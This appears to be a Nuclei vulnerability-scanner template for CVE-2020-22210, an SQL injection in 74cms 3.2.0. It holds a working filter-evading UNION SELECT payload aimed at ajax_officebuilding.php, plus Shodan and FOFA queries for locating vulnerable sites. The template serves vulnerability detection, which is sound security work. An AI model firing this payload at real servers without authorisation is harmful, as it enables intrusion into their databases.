32 lines
891 B
YAML
32 lines
891 B
YAML
id: CVE-2020-22210
|
|
|
|
info:
|
|
name: 74cms - Sql Injection
|
|
author: ritikchaddha
|
|
severity: critical
|
|
description: |
|
|
A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
|
|
reference:
|
|
- https://github.com/blindkey/cve_like/issues/11
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-22210
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-22210
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
fofa-query: app="74cms"
|
|
shodan-query: http.html:"Powered by 74cms"
|
|
tags: cve,cve2020,74cms,sqli
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{randstr}}),5,6,7,8,9%23"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '{{md5("{{randstr}}")}}'
|